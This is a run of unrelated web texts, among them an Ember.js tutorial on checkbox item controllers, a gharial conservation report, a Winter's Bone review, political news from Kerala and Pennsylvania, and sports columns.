Rolovich played for the Rainbow Warriors from 2000-01 as quarterback. He passed for 4,176 yards with 40 touchdowns and 13 interceptions in 14 games over the two years. Rolovich got his start in coaching in '02 at San Marin (Calif.) High as an assistant. He then became a student assistant at Hawaii from '03-04 and coached quarterbacks at City College of San Francisco, the junior college where he began his collegiate playing career, from '06-07.
Chow coached the Rainbow Warriors for four seasons and compiled a 10–36 record before his firing nine games into the 2015 season. The Rainbow Warriors haven't had a winning season since '10, when they went 10–4 under Greg McMackin.
A very common UI design pattern is to display an index of items with checkboxes beside them, so that we can select some items and (for example) delete them in bulk.
We may be tempted to implement our template like this:
1 2 3 4 5 <ul> {{#each}} <li>{{input type="checkbox" checked=selected}} {{name}}</li> {{/each}} </ul>
This certainly works. Each item in the collection will get a selected boolean property, which we can use to filter the collection of selected items.
But there's something about this that should make us feel gross: each item in the collection is likely a model record, which we are polluting with a new selected property. Suddenly the model layer cares about what is strictly a controller-layer concern. The selected property will persist on the records even when a user leaves the route and comes back to it later. Not only are we abusing the separation between controllers and models, but we are potentially adding nonlocal behaviour to our application.
Luckily, Ember provides a relevant mechanism. If we define an itemController property on an array controller, each item in the collection will be wrapped in an instance of the specified object controller.
Let's define a CheckboxableItemController :
1 2 3 App . CheckboxableItemController = Ember . ObjectController . extend ({ selected : false });
Now we can tell Ember to use it for each item in the array controller:
1 2 3 App . FoosIndexController = Ember . ArrayController . extend ({ itemController : 'checkboxableItem' });
Now it's each instance of CheckboxableItemController that gets a selected property, rather than the model it wraps. For good measure, let's see how we can define computed properties for retrieving the list/count of selected items, and an action for removing them.
1 2 3 4 5 6 7 8 9 10 11 12 App . FoosIndexController = Ember . ArrayController . extend ({ itemController : 'checkboxableItem' , selectedItems : Ember . computed . filterBy ( '' , 'selected' , true ), selectedCount : Ember . computed . alias ( 'selectedItems.length' ), actions : { removeSelected : function () { var selectedItems = this . get ( 'selectedItems' ). toArray (); this . removeObjects ( selectedItems ); } } });
Note our use of Ember.computed.filterBy . Critically, we are filtering over '' (i.e. the controller itself), and not 'content' . This is because 'content' is a reference to the underlying collection of items, and not the wrapped ones.
Here is the relevant JS Bin.
Have a happy hacking day. □
This week's blackouts in India have been blamed at least in part on the lack of rain during the annual monsoon season, which hindered hydropower production and increased the demand for electricity for use in agricultural irrigation. But the unusually dry year has also had at least one positive effect: it has helped to boost the population of a critically endangered species.
This year more than 2,000 gharial crocodiles (Gavialis gangeticus) have hatched and, more importantly, survived in India's National Chambal Sanctuary. Under normal circumstances, most gharial hatchlings would be wiped out by floods during monsoon season, but this year, thanks to abnormally low rain levels, the majority of newborns are expected to live. This could represent a major conservation success story for a species whose future not too long ago looked quite dark.
Honestly, I have not held out much hope for writing good news about the gharial, one of the world's rarest crocodilian species. Gharials were once plentiful, but overhunting for their skin and eggs drove their population down from somewhere between 5,000 to 10,000 individuals in the 1940s to fewer than 200 in 1975, the year they were finally protected. Despite captive breeding efforts, things weren't much better more than 20 years later. I first covered the gharial in 2007, by which time there were a grand total of just 200 breeding pairs, at least 80 percent of which lived in the Chambal River. That incredibly low figure started to drop further that year due to a mysterious illness striking the Chambal population. After nearly a year of study and more than 100 gharial deaths, scientists theorized that the animals had likely died from gout and kidney failure, probably caused by exposure to toxic chemicals in nearby polluted rivers. By then the number of adult gharials in the wild in India had dwindled to 100.
Those numbers had improved slightly by 2009 when I covered a team of scientists who were attaching RFID tags to the rare crocs' backs to learn more about their behavior and habitat use. Understanding how, when and why the animals traveled was essential to conservation efforts because captive-bred gharials were almost all dying after being released into the wild.
Flash forward three years and, at last, we have good news about the gharial. India Today reports that this year brought a record number of new gharial hatchlings in the river waters of Chambal Sanctuary. Of the 68 nests found and protected from predators by sanctuary staff this year, as many as 2,340 eggs hatched—more than double the number than in each of the last three years. And if that wasn't good news on its own, it seems that more of these young hatchlings may survive than in past years. "Mortality is usually higher in young gharials as they get washed away in floods, a usual phenomenon in the Chambal River, but this year appears to be an exception," said Sujoy Banerjee, deputy conservator of forests for the National Chambal Wildlife Division. A late and less severe monsoon season than usual gave the hatchlings enough time to grow up and increased their chance at long-term survival.
The wild population of adult gharials in India is still only around 200, but there are also some 1,300 juveniles not yet old enough to breed. Add in any hatchlings that survive from this year's breeding season and we could see a population boom in the next few years.
The species is hardly out of the woods. The Chambal River has been called one of the country's cleanest, but gharials sometimes travel to the nearby Yamuna River, one of the most polluted rivers in the country if not the entire world, which is probably why all those gharials died in 2007 and 2008. But even with the threats that remain, this is good news and well worth celebrating.
***
This is my 400th Extinction Countdown article for Scientific American (and my 965th overall if you count the previous three incarnations of this blog). I want to take a moment to thank my fantastic editors and readers, the scientists and conservationists whose important work I have covered, and all those who take action to help the endangered species of the world. I could write another 10,000 articles and still barely scratch the surface of this critical topic, but keep reading and we'll see what we can accomplish together.
Photo: A gharial with a fish in its slender, fragile jaws by Siddhartha Lammata via Flickr. Used under Creative Commons license
Poster from moviepostershop.com
Sometimes, I sit back and sigh at the current state of cinema.
Franchise powerhouses like Harry Potter and '80s rehashes/way-too-late-sequels like Indiana Jones IV or Terminator: Salvation seem to dominate box offices worldwide despite very negligible cinematic merit, while shock-tactic horror films like the endless Saw saga reel in vast sums of cash with more fake blood than Hallowe'en at Ozzy Osbourne's house; they're often about as coherent as the Prince of Darkness himself, in fact.
It seems, from time to time, that Hollywood is simply running out of ideas, trying to revamp previously successful formulae like Predators or Nightmare On Elm Street to bolster its waning bank balances. It's a bit like buying clothes in a charity shop: occasionally you'll find a gem, but more often than not you realise that this stuff should have been thrown out years ago.
So to come across a film that is brilliantly composed, wonderfully atmospheric, completely under-the-radar and made on a budget less than the wages of Michael Bay's nose-picker is a genuine delight.
Winter's Bone is not based on a series of mega-books, nor a ‘classic' movie, nor a popular toy. In fact, believe it or not, it's an script with original ideas, based on an unheralded novel by Daniel Woodrell, and it shows that a little endeavour and creativity creates far better art than huge amounts of money.
Set in Missouri's bleak, merciless Ozark region, Debra Granik's movie follows the struggles of Ree Dolly (Jennifer Lawrence), a 17 year-old girl whose father is on the lam and whose mother is borderline catatonic. A local sheriff informs Ree that her father put the house up as a bail bond, and if he fails to show for court then the family will be evicted. Ree decides the only thing to do is to find her fugitive dad, and embarks on a harrowing journey to either force him to court or prove he's dead. The local criminals he once ran with, however, are less than co-operative…
As you might've guessed, this is less It's A Wonderful Life and more “it's an unremittingly hard life”. Ree's journey is incredibly harsh, her experiences harrowing and her circumstances unforgiving. The impossibility of her situation is equalled only by her relentless perseverance, and Lawrence, in a very challenging role, is a revelation. Affecting a noticeable (but not Forrest Gumpian) Southern twang, Lawrence communicates Ree's seemingly futile struggle without resorting to cliché or melodrama; Ree's role as the surrogate mother to two younger siblings clashes with her quest, and she is forced to trust throughly untrustworthy family members with their safety while she battles for a greater good.
Ree could become a caricature of the ‘strong woman' archetype, but we see both her tough exterior and a vulnerable heart; she's more Ripley than Erin Brockovich, more get-the-job-done than stick-it-to-the-man. The decisions Ree makes have possibly calamitous ramifications, and Lawrence shows Ree making them with a heavy conscience. One scene in particular, where Ree pleads with her mentally incapacitated mother for advice, is heartbreaking, and showcases Lawrence's manifest acting prowess.
The supporting cast largely flit in and out of Winter's Bone, from Dale Dickey's fearsome Merab to John Hawkes' burnt-out drug addict Teardrop, Ree's uncle with a checkered past and an uneasy relationship with family, law enforcement and the local criminal underworld alike. In a cast filled with relative unknowns, the bulk of the film falls to Lawrence, who shoulders it like a veteran, and Hawkes, whose role gradually becomes more prominent and more intriguing as the film progresses.
However, it's clear that Granik's intention is to make the region itself a star, and between her direction and the cinematography of Michael McDonough, the Ozarks won't be forgotten for anyone who sees the film. The word ‘stark' has been used a lot in association with this movie, but that feels a little unjust, as there is more to this backwater setting than dying forests and thinning grass. Burnt-out cars, abandoned houses and derelict barns litter the landscape, and are somehow made glorious despite their uselessness. The scenery, costumes and backgrounds are all tinted with a light grey, making the very sparse use of colour all the more effective, and the composition of some scenes, as a result, reminds us in places of that masterclass in monochrome filmmaking, Schindler's List. Not bad company, I'm sure you'll agree.
Combining elements of classic filmmaking with more contemporary nous, Granik's film is remarkably accomplished for just her second feature, and the director manages to depict tedium, horror and violence with equal dexterity. Ree's encounters with the local criminal underbelly are tense, volatile and occasionally explosive.
Despite all its brilliance, there are a few flaws: the relationship between Ree and her mother, though clearly strained, could do with further investigation, as could her friendships, which seem to have been created out of convenience rather than love. In such an isolated community, we should perhaps have a better grasp of what's going on, as at times it feels that the viewer is slightly too far out of the loop: while it's necessary to shroud certain facts to create tension, a touch more background information in places would not go amiss.
Overall, however, Winter's Bone is a triumph of low-budget filmmaking and ingenuity, featuring an excellent performance from John Hawkes and a star-making one from Jennifer Lawrence. For a film set in such a bleak locale, Winter's Bone is brimming with fresh ideas, vivid performances and a bright young star as its lead.
9/10: If filmed, as we considered it, is a charity shop, this movie is the Gucci suit you bought for £4. It's a marvellous achievement, and the early Oscar hype for Lawrence is far from unwarranted. In a sometimes frustratingly stagnant big-money era, this is a both a blast from the past and hopefully a glimpse of a better cinematic future. Gripping.
Luke Grundy is a fervent assimilator of media living amid the bright lights of London, England. If he's not watching films or listening to music, he's probably asleep, eating or dead. An aspiring writer, journalist and musician, he is the creator of movie/music blog Odessa & Tucson and lives for epistemology.
About a year ago, in an attempt to stop people from being excessively nice to the handicapped, the Gothenburg Cooperative for Independent Living (GIL) made a physically challenged doll with cerebral palsy. I was kind of unsure of the whole thing when I first heard about it; surely there are better ways to make people treat the handicapped like everyone else than a limited run of dolls with cerebral palsy. But it couldn't have been a complete failure, as GIL are still putting out the dolls and have just released their own brand of handicapped beer.
The cerebral palsy beer, or CPA, was previewed at Gothenburg's annual whiskey fair and was later premiered at Live and Function, one of Scandinavia's biggest health and care fairs. I have no idea what alcohol and healthcare have in common, so I called up our friend Anders Westgerd at GIL to find out.
VICE: Hey, Anders. How can brewing beer help the handicapped?
Anders Westgerd: Well, this is part of how we work socio-politically. In Sweden in the early 2000s, an investigation called Patient to Citizen decided that all restaurants, bars, and public spaces in general would become easy to access and have all kinds of obstacles removed by 2010. But when we realized in 2009 that not a thing had been done to improve public spaces, we decided to draw attention to limited access bars and restaurants. Because these are cool environments where people would like to hang out.
So what did you do about it?
Well, everybody wants to be part of society—drink a beer, have fun, and live life. So we listed three bars in the Gothenburg area that the handicapped cannot access and wrote them letters informing them of it. We also listed one bar that's easy to access to show them a good example. So you could say that all of this is the reason for us to now brew our own beer.
I remember you mentioning the beer drinking when we talked to you about the doll.
Yeah. When we made the doll, we wanted people to share with us how they experience problems in society. And many people told us that when they go out in bars they feel like they're being questioned. It's like, when you drink one beer people look at you, and if you drink two, three, or four beers, well then people start morally panicking. Making a beer makes it easy for us to claim some space in bars that aren't normally aren't accessible for us.
How has the beer been received so far?
It's a success. At the sneak peak at the Gothenburg Whiskey Fair, for example, we didn't think that their audience would care much about the message behind the beer. But people at the fair thought is a pretty clever way to address the problems that surround this issue. And since it's a hell of a good beer, well, I think they were impressed.
And how did the audience react at the health and care fair?
Very well. There, everything is kind of about how to make life easier for the handicapped. But we wanted to focus on life and how to live life. I mean, you can drink a beer no matter who you are. And with a beer in your hand, you become yourself and not your disability. So it was a success there too.
What does it taste like?
It's a mix between an Indian pale ale and an American pale ale. So it's what you call a hybrid between an IPA and APA. And that's where the name comes from: CPA. It's also brewed on the four classic hops, which all have names beginning with a C—as in cerebral palsy—so there you have yet another reason for its name.
That's genius.
There's a lot of thought behind the beer. It's a brilliant messenger.
More beer?
Beer and Bongs
Why I Quit Drinking
September 01, 2014 14:27 IST
The Rashtriya Swayamsevak Sangh's district-level leader in Kannur, Kerala, was hacked to death on Monday morning. The district has been witnessing a bloody feud between the Communist Party of India-Marxist and the RSS.
Elanthottil Manoj, the latest victim of this violence, was hacked to death by goons who barged into his house. Manoj was the district leader of the Sharirik Shikshan, affiliated to the RSS. The incident occurred in Kizhakke Kadirur near Thalassery, the epicentre of political violence in Kannur district.
Only last week, a Bharatiya Mazdoor Sangh worker, Suresh Kumar, was killed in the district, allegedly by CPM activists.
The Bharatiya Janata Party and the RSS have called for a hartal in Kannur district on Tuesday following Manoj's killing.
The latest murder took place even as RSS chief Mohan Bhagwat and the BJP's national president Amit Shah are in Kerala. Bhagwat was in the state for the past seven days, addressing organisational matters in different parts of south Kerala .
The latest incident of violence comes in the wake of reports of several CPM cadres switching over to the BJP.
Manoj is said to have been one of the pillars of the RSS in the troubled areas of Thalassery and Panoor. A police case had been filed against some CPM activists for attacking Manoj some years earlier.
In fact, CPM workers were found guilty of murdering their former activist, T P Chandrasekharan, in May 2012. Chandrasekharan had switched over from the CPM to the Revolutionary Marxist Party.
Thalassery has witnessed many volatile political killings in the past. The BJP youth wing's state vice president K T Jayakrishnan was killed in an upper primary classroom as he was teaching students. The BJP's former general secretary of Kannur district, Panniyanoor Chandran, was killed while he was riding a motorcycle along with his wife.
Image: BJP president Amit Shah (third from right) visiting the Padmanabha Swamy temple in Thiruvananthapuram, on Monday.
[Warning: If you've yet to watch Sunday's jaw-dropping installment of Dexter, avert your eyes…now! Everyone else, read on…]
“You can't be a hero and a killer…it doesn't work that way!”
The horrific death of Brother Sam in Sunday's Dexter galvanized the titular character's Dark Passenger, sparking a reunion with one of his most formidable antagonists to date: his older (and very much dead) brother, Brian “Ice Truck Killer” Moser. In the following Q&A, showrunner Scott Buck teases what lies ahead for Dexter and his serial-killing sibling, reveals how long actor Christian Camargo will be sticking around, and explains what all of this means for James Remar's dead beat dad/guardian angel Harry.
Dexter‘s Jennifer Carpenter on the Deb/Dex Scene She's ‘Scared' Of
TVLINE | It's hard to believe Christian's return didn't leak! How did this all come about?
It's actually something we've been talking about over the course of several seasons. We were just always looking for the right opportunity to do it. We know that [Brian Moser reappearing] is really something we can only do once, so we really didn't want to waste it. We were looking to create the exact right story and situation, and it finally presented itself. We were very happy to bring Christan back into the fold.
TVLINE | What was his reaction to being invited back after a five-season hiatus?
He actually went out of his way to do this. Christian was set to direct a movie at the time, so he completely broke his schedule to fit us in. We're very thankful for that.
TVLINE | Given the nature of tonight's final scene, the assumption would be that Brian is now the alterna-Harry within Dexter's mind, and that he's servicing his Dark Passenger instead of cautioning against it. Is that accurate?
That is pretty accurate. Harry very much represents a code to Dexter and this is now a new serial killer alter-ego who has no code, so it potentially sets Dexter in a direction that Harry would never allow him to go.
Dexter Scoop: Who Is Not Returning This Season
TVLINE | What does Brian's appearance mean for Harry?
Harry's certainly not gone. He comes back very quickly and in a very strong way. This all just emphasizes how important Harry and his code really are to who Dexter is. Those things are meant to keep him on the path of being a “good serial killer,” if there is such a thing. [Laughs]
TVLINE | So, Brian is purely around to channel Dexter's darkest desires?
This is obviously a very limited appearance on Christian's part, but he comes back [to the show] in a strong and dynamic way and leaves in an equally dynamic way. That said, yes, he takes Dexter down a dark journey.
Minnesota has banned MRUniversity and other online education services from providing content to Minnesota residents. This seems like a joke but it is not from The Onion. Coursera, one of the larger players in this field, has rewritten its terms of service to prohibit Minnesota residents from taking its courses:
Coursera has been informed by the Minnesota Office of Higher Education that under Minnesota Statutes (136A.61 to 136A.71), a university cannot offer online courses to Minnesota residents unless the university has received authorization from the State of Minnesota to do so. If you are a resident of Minnesota, you agree that either (1) you will not take courses on Coursera, or (2) for each class that you take, the majority of work you do for the class will be done from outside the State of Minnesota.
Tyler and I wish to be perfectly clear: unlike Coursera, we will not shut down MRU to the residents of Minnesota. We are prepared to defend our rights under the First Amendment to teach the good people of Minnesota all about the Solow Model, water policy in Africa, and the economics of garlic–even if we have to do so from a Minnesota jail!
Have you ever heard the expression, ‘Be careful what you wish for'? For some people, the opening of the 3rd eye can show them things that they really didn't want to see. For others, it's a journey of enlightenment. If you are sure that this is something you want to do, then please read on.
According to wiki, the third eye (also known as the inner eye) is a mystical and esoteric concept referring to a speculative invisible eye which provides perception beyond ordinary sight. In certain dharmic spiritual traditions such as Hinduism, the third eye refers to the ajna, or brow, chakra. The third eye is referred to the gate that leads within to inner realms and spaces of higher consciousness. In New Age spirituality, the third eye often symbolizes a state of enlightenment or the evocation of mental images having deeply personal spiritual or psychological significance. The third eye is often associated with religious visions,clairvoyance, the ability to observe chakras and auras, precognition, and out-of-body experiences. People who are claimed to have the capacity to utilize their third eyes are sometimes known as seers.
On the Above Top Secret website, a person by the name of “pellian” stated the following:
i found a very real technique that will increase your spiritual perception by a thousand-fold. I won't tell anybody what it is or where I learned it because Some may attract very evil entities and possibly destroy themselves over it. The very first night I tried this i had a very different type of dream which i had not had before. the content doesn't mean anything but i digress. The day After i notice that sometimes my awareness would shift and my vision seems different for a moment. i thought that this is really cool. i do the exercises again soon after. same thing at night. I see colors and shapes that follow my vision. These were there if I closed my eye in complete darkness or opened them in the very dim light of my room. These seemed to be objects of some sort that gave off a dim glow and had a woven pattern. As I practiced it sounds really crazy But I think that these exercises created some sort of energy that attract astral forms. One night I woke up and saw this thick rope strung from my window sill to the door. at the moment i knew what it was. I made the mistake of touching this animal or thing and felt a jolt like electricity. I was definitely awake I immediately felt very sick and had chills all over my body. I continued the exercises two weeks later i was really close to sleep and a blue ring of light that fluttered like a butterfly came into my room. I turned on the light and the ring persisted of about a second after and I again felt a sting i my side and the same chills. I assure that I am not dreaming and fully awake. If this is not some crazy hallucination then whatever I have been doing is either lighting me up like a porch light to attract moths or these entities are coming through to this world via my consciousness. A hallucination cannot affect you physiologically to make a shock effect. I also have noticed that when did the exercises something seems to materialize in my room. The way this thing or object would materialize is that it would appear like it was a different refractive index like the air. I would also see entities that looked like this right after I wake up. I have even noticed small feathers falling down in my room. The level of perception was incredible. But was not worth being bothered by these entities.
I view it as the difference between having a solid spiritual mind or having a fear based mind. It's kind of like the 3rd eye mirror meditation where you end up seeing various faces from the collection or some of your past lives. Not everyone will be ready for an experience such as that.
The following is a tutorial video along with the PDF on how to open your 3rd eye. If you think you're ready for this, then please proceed…
There is a video after this ebook that will walk you through your 3rd eye awakening but I would recommend reading the book, first!
You can find it on Amazon …or online at this link: www.eso-garden.com/specials/awakening_the_third_eye.pdf
Awakening The Third Eye, a practical meditation by Samuel Sagan. (M.D.) the first “hand's on”, so to speak, set of practice exercises designed to give a direct sense and feel of the 3rd eye like never before!!!
+++++ Samuel Sagan – Awakening the Third Eye by Ankita Sharma on Scribd
I recently made a video and article entitled, Do THIS Right Before You Go To Sleep To Open Your 3rd Eye!, as a simple way to open your 3rd eye. You can find the video below but be sure to check out the article as well!
Thanks to In 5D for this article
Long ago, videogame developers unwittingly made a monster. Ripping it from the confines of reality, they educated this monster in a world designed just for it. It learned well - maybe too well - and the creators now find themselves enslaved by their own creation, forced to please the monster's clashing desires for new experiences and comfortable, repeated concepts.
That monster is us.
As gamers, many of us roll our eyes at the clichés that have sprung up within the industry. Every red barrel and goody-yielding crate implies a lack of inspiration on the part of developers. Why so cookie cutter? Why can't more games try something new?
Yet playtests repeatedly confirm we depend on the very conventions we tend to mock. It's not that all developers are lazy; some actually work with the tropes in mind and try to avoid them. When it comes time for testing, however, players often end up tripping over their own expectations. The makers of Half-Life originally tried to circumvent the use of crates as common objects in the environment, but playtesters were continually disappointed by the lack of smashable items and the ability to fetch rewards from them. Their crowbars cried out for convention.
"We worried about the crate cliché a lot during development," Gabe Newell said in the coffee-table book Half-Life 2, Raising the Bar. "Finally, we gave up, and one of the first things you see when you start the game is a crate. We figured this was the ... equivalent of throwing yourself to the mercy of the court."
While it is partly developers' faults for establishing clichés in the first place, we are also wired as human beings to stubbornly fall back on prior experience when facing new ways of looking at things. The concept of "functional fixedness" states that we tend to limit our views on the uses of objects based on their traditional purposes. The "candle task" demonstrates this concept and how much impact presentation has on our thinking.
In the test, people were given a candle, matches and a box filled with tacks. Their mission was to attach the candle to the wall in a way that wax would not drip onto the floor when it was lit. The answer is to secure the box to the wall with tacks and use it as a candleholder, but the majority of test subjects failed. They had not even considered the box as a tool they could use, but only as a container for the tacks. When the tacks and box were presented separately, more people solved the problem.
Bills seek to make English official Pa. language
HARRISBURG -- It's a hot political issue that divides the state's conservatives from liberals, rural residents from multicultural urbanites, and people whose main language is English -- that is, most Pennsylvanians -- from those who speak it only as a second language, with Spanish usually the first.
Two bills have been introduced in the Legislature to make English the "official" language of the Keystone State, meaning there no longer would be any state government pamphlets or publications printed in any other language.
"This is our country, our culture, our lifestyle and our language," Rep. Scott Perry, R-York, said. "If our language doesn't suit you, no one forced you to come here and no one is forcing you to stay."
The bills also could mean decreased state funding for English-as-a-Second-Language programs, used to teach English to foreign-born immigrants and their children. It also could prevent truckers who don't speak English from getting a commercial driving license and driving their heavy rigs down state highways where they can't read the road signs.
"How safe do you feel knowing you are driving your vehicle at 60 mph next to individuals operating vehicles up to 40 tons who have been licensed with minimal standards of English proficiency?" Mr. Perry asked the House State Government Committee on Wednesday.
He has sponsored House Bill 888, which -- along with House Bill 361 by Rep. RoseMarie Swanger, R-Lebanon -- would make English the official language in the state and prevent state funds being used for bilingual publications.
Some Republican legislators said it's a waste of taxpayers' money to print government documents in languages other than English. They said 29 languages other than English are spoken in the state, with most non-English speakers using Spanish, but many others speaking one of several dialects from China, the Philippines or other Asian languages, plus Russian, German, French or Italian.
"If you want to be part of our society, learn our language," Mr. Perry said. "I question the state's right to force its taxpayers to subsidize ... elevated teaching costs and other elevation taxation costs ... for the sake of a minority of individuals" who don't speak English.
Ms. Swanger rebutted criticism that her bill was "prejudicial or racist," adding that it "will encourage immigrants to learn English, help them get jobs and reduce their dependence on welfare."
Rep. Brad Roae, R-Crawford, held up a state-funded pamphlet that read "El Capitolio de Pennsylvania -- Un Recorrido Guiada por si Mismo," which is given to Spanish-speaking visitors to the Capitol. It's the equivalent of an English pamphlet called "The Pennsylvania Capitol -- A Self-Guided Tour."
"How much will we be [saving] taxpayers to print these state documents only in English?" Mr. Roae asked, but no one could answer.
"We have boxes and boxes of them," a Capitol tour guide said later, referring to the Spanish pamphlets, also questioning why one foreign language is singled out for a special pamphlet.
Bilingual ballots, required by the federal government, won't be affected by the state legislation, but Mr. Roae said Cuyahoga County, Ohio, will spend an additional $100,000 in 2012 by having to print ballots in Spanish as well as English, an expense he questioned. He said Oklahoma expects to save $50,000 by printing drivers license tests in English only.
Suzanne Bibby of a Washington, D.C.-based group called ProEnglish, supported the bills and said 31 other states have already made English their official state language.
She said that in Texas, which isn't one of them, one man testified in Spanish before a legislative committee, which forced the panel to hire a translator to let members know what the man was saying. She said such costs to the public shouldn't be allowed.
Before the hearing began, Rep. Daryl Metcalfe, R-Cranberry, called for a moment of silence for "a great patriot," former Philadelphia cheesesteak restaurant owner Joey Vento, who died in August. He drew national publicity in 2006 when he put up signs requiring customers make their orders only in English and no other language.
But Rep. Babette Josephs, D-Philadelphia, and others, including the American Civil Liberties Union and Community Legal Services of Philadelphia, strongly opposed the English-only bills.
Ms. Josephs said she has a person on her staff in Philadelphia who speaks Russian and has helped constituents who only speak Russian. She said she sends out emails and letters in Spanish to constituents who don't speak English.
Under the bills, a legislator wouldn't be able to hire a staffer who speaks only Spanish or another foreign tongue or be able to send out state-funded information in another language. Ms. Josephs said that will hurt her ability to serve her inner-city constituents, many of whom speak mainly Spanish or Chinese.
"Buenos días, gracias," she said to Ms. Bibby, irking Mr. Metcalfe, who cut her off from asking too many questions.
Community Legal Services said it has 18,000 low-income clients in Philadelphia, many of whom aren't proficient in English. It said that for state and local governments "to operate effectively, they must be available and accessible to all persons, regardless of how well they speak English." They need to have "public information and public services" explained in their own language.
Anne O'Callaghan of a Philadelphia tourist group called the Welcoming Center for New Pennsylvanians, also opposed the bills, saying they would make Pennsylvania unfriendly to visitors and tourists and cost the state much money in lost tourist revenue.
She also said the bills would open Pennsylvania up to lawsuits in federal court, but Ms. Bibby said such suits in other states have been defeated.
The English-only measures are due to be discussed by the House when it resumes work Sept. 26.
First published on September 15, 2011 at 12:00 am
Clark Atlanta University's Men's Basketball coach Darrell Walker will host the 2nd Annual Darrell Walker Art and Basketball Auction on Tuesday, September 12 to raise funds to offset the cost of summer school for student-athletes.
“Coach Walker raises money for us to graduate on time, so I repay him by working hard in my classes,” said point-guard A.J. Williams. “I took two hard economic classes this summer, and it was paid for with a scholarship from the art auction. It would have been really tough if I had to pay for it myself.”
Williams, who was raised by his single mother, transferred into CAU from a junior college in Brooklyn, N.Y. “I faced a lot of adversities in Brooklyn. Either you are on the streets, or you play basketball. It was a tough place to grow up, but I knew I couldn't let my mother down,” says the business management major. “Coach Walker is tough on me because we play the same position. But I relate to him. He's one of the best coaches I've ever played for.”
Walker, a former point guard with the New York Knicks and Chicago Bulls and former head coach of the Toronto Raptors and Washington Wizards, won the 2017 Southern Intercollegiate Athletic Conference (SIAC) Men's Basketball Tournament championship in his first year with the Panthers. He recruited Williams in 2016.
Along with his NBA success, Walker has been an avid art collector since early in his NBA playing career. His collection includes more than 80 pieces. “I'm combining my two biggest passions to impact the lives of these young men,” he said. “These aren't just my players, they are my sons, and leveraging my status to launch their careers is the way I pay it forward.”
Williams, a senior, will graduate Spring 2018 thanks to his efforts. “Coach believed in me, he trusted me and I thank God for him every day.”
The 2nd Annual Darrell Walker Art and Basketball Auction will be held at 6 p.m. on September 12 in the Beauchamp Carr Gallery at the Robert Woodruff Arts Center in Atlanta.
Also On Atlanta Daily World:
Tennessee GOP Congressman Stephen Fincher, swept into office in the Tea Party wave of 2010, is on a mission from God.
Armed with an array of proverbs and quotes from the Holy Bible, Congressman Fincher is pressing his fight to dramatically curtail the Supplemental Nutrition Assistance Program (SNAP)—better known to most Americans as food stamps—relied upon by 47 million Americans for some or all of their daily sustenance.
Why?
Because the Bible tells him so.
Appearing this past weekend at a gathering at a Memphis Holiday Inn, Fincher explained his position on food stamps by stating, “The role of citizens, of Christians, of humanity is to take care of each other, but not for Washington to steal from those in the country and give to others in the country.”
The Congressman's remarks come on the heels of his taking the biblical route when responding to Representative Juan Vargas' (D-Calif.) somewhat different take on the teachings of Jesus. During a recent House Agriculture Committee debate over the Farm Bill (which contains the food stamp budget), Vargas, citing the Book of Matthew, noted, “[Jesus] says how you treat the least among us, the least of our brothers, that's how you treat him.”
Vargas also noted that Jesus directly mentions the importance of feeding the hungry.
Not to be outdone by a Godless Democrat, Congressman Fincher responded with his own Bible quote taken from the Book of Thessalonians—“The one who is unwilling to work shall not eat.”
Nicely played, Congressman.
While the biblical back-and-forth is interesting, I wonder if Congressman Fincher would be good enough to refer me to the part of the Bible revealing to us how providing adequate food stamp assistance to those in need violates the teachings of Christianity but venerates accepting government hand-outs in the guise of farm subsidies?
Maybe the Congressman can instruct heathens such as I on how pocketing huge sums of taxpayer money in the guise of farm subsidies is a righteous act, while accepting government subsidies to feed one's family is an act of—to use Fincher's own words—stealing from those in the country to give to others in the country?
I don't ask these questions of Congressman Fincher indiscriminately. I ask them because of Fincher's unique qualification to provide us with the appropriate proverb intended to instruct.
You see, Representative Fincher happens to be the second largest recipient of farm subsidies in the United States Congress—which might explain why Mr. Fincher would like to decimate the food stamp budget in order to do the Lord's work when “supporting a proposal to expand crop insurance by $9 billion over the next 10 years.”
How much money are the taxpayers forking over to Congressman Fincher via farm subsidies?
While Fincher may only come in second amongst his congressional peers when it comes to pocketing huge sums of taxpayer money, he has the distinction of being one of the largest recipients of subsidies in the history of the great State of Tennessee.
As reported by Environmental Working Group,
USDA data collected in EWG's (Environmental Working Group) 2013 farm subsidy database update -- going live tomorrow --shows that Fincher collected a staggering $3.48 million in “our” money from 1999 to 2012. In 2012 alone, the congressman was cut a government check for a $70,000 direct payment. Direct payments are issued automatically, regardless of need, and go predominantly to the largest, most profitable farm operations in the country. Fincher's $70,000 farm subsidy haul in 2012 dwarfs the average 2012 SNAP benefit in Tennessee of $1,586.40, and it is nearly double of Tennessee's median household income. After voting to cut SNAP by more than $20 billion, Fincher joined his colleagues to support a proposal to expand crop insurance subsidies by $9 billion over the next 10 years.” EWG additionally points out that while food stamp benefits are restricted to families below specified income levels, there are no such limits on crop insurance subsidies. While SNAP benefits are restricted to families whose income is below specified limits, crop insurance subsidies have no such limitations. As a result, there are farmers in this country who receive a check each and every year for more than $1 million government subsidies while some 10,000 earn more than $100,00 courtesy of the taxpayers.
Not bad.
(Continue reading)
But I'm sure that Congressman Fincher would gladly offer up the appropriate homily to support the lining his own pockets with taxpayer money while spitting fire and brimstone in the direction of those Americans (earning less than $30,000 a year) getting a little help from the taxpayer when it comes to feeding their families.
After all, it's in the Bible…right Congressman FIncher?
By gaining planning permission this week for their new ground at Stamford Bridge, Chelsea will make it a three-way capital heavyweight contest with Tottenham and West Ham to get elusive naming rights.
Spurs, who will finish their White Hart Lane building work at least two years ahead of Chelsea, have demanding chairman Daniel Levy looking for a long-term deal worth more than double Arsenal's £150million Emirates Stadium contract in 2012 that included a shirt sponsorship.
Ideally, Levy wants a 20-year agreement worth £20m annually, knowing how difficult it would be to re-name a UK stadium for a second time, and there is talk of possible Chinese investment.
The development of White Hart Lane continues apace and Spurs are looking for sponsors
Spurs chairman Daniel Levy (left) wants a 20-year, £20million-a-year deal
The difficulty of securing naming rights is shown by Indian technology company Mahindra Group, who failed to agree the £4.5million-a-year asking price for West Ham's London Stadium despite being in advanced talks.
The hooligan trouble that marred the early games there will not have helped the search for another sponsor.
Chelsea, whose building development is privately financed so far by owner Roman Abramovich, are concentrating on the search for building contractors ahead of the hunt for naming backers.
Chelsea's improved Stamford Bridge is another London stadium with naming rights to sell
West Ham are pursuing a stadium sponsor as well, meaning a three-way capital battle
Aleksander Ceferin, president of UEFA, does not claim to be a TV rights expert.
But in speaking to the British press in Zurich this week, he knows enough to understand the importance of UK terrestrial involvement in the next Champions League contract — with the tender being launched next week — following the paltry viewing figures on subscription channel BT Sport.
Gary Neville, who likes to lecture sports journalists on how to do their job, will not be giving his full focus on the day to preparing for his co-commentary role on Sky Sports' coverage of Manchester United v Liverpool on Sunday.
